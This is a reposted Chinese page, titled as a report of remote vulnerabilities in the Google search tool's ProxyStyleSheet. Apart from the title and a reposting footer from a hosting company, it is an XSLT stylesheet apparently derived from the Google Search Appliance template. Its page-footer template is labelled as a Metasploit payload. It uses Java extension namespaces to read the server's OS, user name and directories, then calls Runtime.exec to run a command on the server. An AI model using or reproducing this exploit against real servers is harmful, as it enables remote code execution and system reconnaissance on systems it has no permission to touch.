Google搜索工具ProxyStyleSheet多个远程安全漏洞

<!-- *** used in result cache link, similar pages link, and description *** -->
<xsl:variable name="faint_color">#6f6f6f</xsl:variable>

<!-- *** show secure results radio button *** -->
<xsl:variable name="show_secure_radio">0</xsl:variable>

<!-- **********************************************************************
Other variables (can be customized)
********************************************************************** -->

<!-- *** page title *** -->
<xsl:variable name="front_page_title">Search Home</xsl:variable>
<xsl:variable name="result_page_title">Search Results</xsl:variable>
<xsl:variable name="adv_page_title">Advanced Search</xsl:variable>
<xsl:variable name="error_page_title">Error</xsl:variable>

<!-- *** choose adv_search page header: '', 'provided', 'mine', or 'both' *** -->
<xsl:variable name="choose_adv_search_page_header">both</xsl:variable>

<!-- *** cached page header text *** -->
<xsl:variable name="cached_page_header_text">This is the cached copy of </xsl:variable>

<!-- *** error message text *** -->
<xsl:variable name="xml_error_msg_text">Unknown XML result type.</xsl:variable>
<xsl:variable name="xml_error_des_text">View page source to see the offending XML.</xsl:variable>

<!-- *** advanced search page panel background color *** -->
<xsl:variable name="adv_search_panel_bgcolor">#cbdced</xsl:variable>


<!-- **********************************************************************
My global page header/footer (can be customized)
********************************************************************** -->
<xsl:template name="my_page_header">
<!-- *** replace the following with your own xhtml code or replace the text
between the xsl:text tags with html escaped html code *** -->
<xsl:text disable-output-escaping="yes"> <!-- Please enter html code below. --></xsl:text>
</xsl:template>

<xsl:template
name="my_page_footer"
xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime"
>

<!-- Google XSLT Code Execution [metasploit] -->

XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br />
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />

Executing command...<br />
<xsl:value-of select="run:exec(run:getRuntime(), ':x:MSF:x:')" />

<xsl:text disable-output-escaping="yes"> <!-- Please enter html code below. --></xsl:text>
</span>
</xsl:template>


<!-- **********************************************************************
Logo template (can be customized)
********************************************************************** -->
<xsl:template name="logo">
<a href="{$home_url}"><img src="{$logo_url}"
width="{$logo_width}" height="{$logo_height}"
alt="Go to Search Home" border="0" /></a>
</xsl:template>


<!-- **********************************************************************
Search result page header (can be customized): logo and search box
********************************************************************** -->
<xsl:template name="result_page_header">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<xsl:if test="$show_logo != '0'">

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!